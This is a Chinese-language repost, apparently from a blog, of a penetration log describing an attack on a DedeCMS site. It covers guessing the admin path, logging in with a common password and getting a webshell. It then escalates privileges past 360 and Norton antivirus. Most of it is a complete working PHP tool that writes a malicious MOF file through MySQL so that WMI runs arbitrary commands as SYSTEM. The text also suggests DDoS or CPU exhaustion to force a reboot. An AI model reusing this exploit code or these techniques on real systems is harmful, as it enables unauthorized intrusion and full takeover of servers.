當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

一次绕过360+诺顿的提权过程

發(fā)布時(shí)間：2024/10/12 编程问答 27 豆豆

生活随笔收集整理的這篇文章主要介紹了一次绕过360+诺顿的提权过程小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

索引

0x01 獲取webshell

0x02 繞過殺軟提權(quán)思路

0x03?mof 提權(quán)原理

0x04利用mysql寫入mof提權(quán)

0x05 總結(jié)

0x01 獲取webshell

在一次滲透中，獲取了內(nèi)網(wǎng)主機(jī)若干，外網(wǎng)就只搞下2臺(tái)主機(jī)，一直想對(duì)關(guān)鍵的業(yè)務(wù)服務(wù)器進(jìn)行滲透，機(jī)緣巧合之下看見目標(biāo)主戰(zhàn)居然是dedecms，版本比較新是20150507 的，手上沒有0day,就靠基本思路后臺(tái)--webshell來搞，先猜后臺(tái)

/admin123 管理員名字+電話 /admin域名域名+admin域名+manage

猜到域名+admin 的時(shí)候，出來了dedecms的主站頁面，拿管理員的常用密碼測(cè)試，進(jìn)入后臺(tái)獲取webshell

0x02??提權(quán)
進(jìn)去一看，執(zhí)行cmd不成功，分析看看是什么原因?qū)е碌哪?#xff1f; 執(zhí)行phpinfo();??看到disable_function這里把常用的敏感函數(shù)給禁止了
環(huán)境為apache+windows2008+諾頓+360，apache在windows上默認(rèn)是已system權(quán)限上啟動(dòng)的，也就是說我們的webshell能直接修改任意文件了，在shell翻到了mysql的root密碼(默認(rèn)情況下mysql也是root權(quán)限)

現(xiàn)在就有以下幾種思路：

1.覆蓋sethc或者放大鏡 2.mysql udf提權(quán) 3.mof提權(quán) 4.替換常用軟件，等管理員登錄來點(diǎn)擊（添加shellcode） 5.在啟動(dòng)項(xiàng)里增加bat，或者遠(yuǎn)控，前提是遠(yuǎn)控要免殺， bat直接加管理員會(huì)被360殺，缺點(diǎn)是要等電腦重啟，一般服務(wù)器重啟至少得等10.20天，等來黃花菜都涼了··· 要他重啟還可以流量ddos,或者用php把他cpu耗盡，自然也重啟了，不過動(dòng)作太大了不太好。容易讓管理員意識(shí)到有人攻擊 6.dll 劫持

　　試常用的sehtc劫持和放大鏡劫持直接被360干掉了，（本地360復(fù)現(xiàn)的）
測(cè)試mysql udf提權(quán) 提權(quán)的shell??被諾頓和360殺的不要不要的··慘··
測(cè)試替換常用軟件，看見管理員已經(jīng)10多天沒有登錄，不知道等他登錄要多久·· 而且免殺是個(gè)問題·· 遠(yuǎn)控不免殺··
測(cè)試啟動(dòng)項(xiàng)直接加用戶，尼瑪360又?jǐn)r截··
問群里的大牛，大牛說可以試試mof提權(quán)，

0x03 mof 提權(quán)原理

Windows 管理規(guī)范 (WMI) 提供了以下三種方法編譯到WMI存儲(chǔ)庫(kù)的托管對(duì)象格式 (MOF) 文件，其中一種是

拖放到%SystemRoot%\System32\Wbem\MOF文件夾的 MOF 文件。

wmi 是可以調(diào)用WScript.Shell 的，WScript.Shell 可以直接調(diào)用cmd執(zhí)行文件，提權(quán)

0x04 利用mysql寫入mof提權(quán)

<?php $path="c:/windows/system32/canimei"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POST['user']); setcookie("connect[pass]",$_POST['pass']); setcookie("connect[dbname]",$_POST['dbname']); echo "<script>location.href='?action=connect'</script>"; } if(empty($_GET["action"])){ ?> <html> <head><title>Win MOF Shell</title></head> <body> <form action="?action=connect" method="post"> Host: <input type="text" name="host" value="192.168.200.144:3306"><br/> User: <input type="text" name="user" value="root"><br/> Pass: <input type="password" name="pass" value="toor"><br/> DB: <input type="text" name="dbname" value="mysql"><br/> <input type="submit" name="submit" value="Submit"><br/> </form> </body> </html> <?php exit; } if ($_GET[action]=='connect') { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>"; echo "Cmd:"; echo "<input type='text' name='cmd' value='$strCmd'?>"; echo "<br>"; echo "<br>"; echo "<input type='submit' value='Exploit'>"; echo "</form>"; echo "<form action='' method='post'>"; echo "<input type='hidden' name='flag' value='flag'>"; echo "<input type='submit'value=' Read '>"; echo "</form>"; if (isset($_POST['cmd'])){ $strCmd=$_POST['cmd']; $cmdshell='cmd /c '.$strCmd.'>'.$path; $mofname="c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") instance of __EventFilter as \$EventFilter { EventNamespace = \"Root\\\\\\\\Cimv2\"; Name = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\"; }; instance of ActiveScriptEventConsumer as \$Consumer { Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; }; instance of __FilterToConsumerBinding { Consumer = \$Consumer; Filter = \$EventFilter; };"; mysql_select_db($_COOKIE["connect"]["dbname"],$conn); $sql1="select '$payload' into dumpfile '$mofname';"; if(mysql_query($sql1)) echo "<hr>Execute Successful!<br> Please click the read button to check the result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn); } if(isset($_POST['flag'])) { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); $sql2="select load_file(\"".$path."\");"; $result2=mysql_query($sql2); $num=mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "<hr/>"; echo '<pre>'. $row[0].'</pre>'; } mysql_close($conn); } } ?>

0x05 總結(jié)

猜后臺(tái)>撞密碼>webshell>提權(quán) 的一個(gè)過程

參考連接:

http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390
http://lcx.cc/?i=4048
http://blog.csdn.net/yiyefangzhou24/article/details/11760277

轉(zhuǎn)載于:https://www.cnblogs.com/miaomiaoxia/p/5477281.html

總結(jié)

以上是生活随笔為你收集整理的一次绕过360+诺顿的提权过程的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。